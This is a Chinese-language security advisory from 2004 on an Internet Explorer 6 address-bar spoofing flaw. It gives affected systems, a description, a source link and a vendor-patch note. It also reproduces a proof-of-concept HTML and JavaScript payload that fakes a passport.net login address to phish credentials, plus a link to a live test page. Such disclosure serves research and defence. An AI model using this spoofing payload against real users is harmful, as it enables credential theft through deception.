安全研究

安全漏洞
Microsoft Internet Explorer 6地址栏欺骗漏洞

发布日期:2004-12-07
更新日期:2004-12-09

受影响系统:
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP Professional SP1
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home SP1
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2000 SP3
描述:
Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer对部分脚本处理不正确,远程攻击者可以利用这个漏洞伪造地址栏,欺骗用户。

攻击者可以构建恶意链接,诱使用户访问,导致显示的地址栏可为实际的地址,欺骗用户,用户会盲目的输入敏感信息而泄露。

<*来源:http-equiv@excite.comhttp-equiv@excite.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110253299711318&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http-equiv@excite.comhttp-equiv@excite.com)提供了如下测试方法:

<phorm  id="phoo" action="res://C:\\WINDOWS\\system3\\
shdoclc.dll//dnserror.htm#http://login.passport.net/uilogin.srf?id=666"
method="post">
<input  type="submit" value="default value"></phorm>
<a id="phee" hreph="hotphemail.html" target="_search">test</a>

<script>
var malware = screen.availHeight;
window.moveTo(0, 0);
window.resizeTo(500,malware);
phee.click()
setTimeout("phoo.submit();",1);
</script>

测试页面如下:

http://www.malware.com/pzeesh.html

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:3773
严重程度:11(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障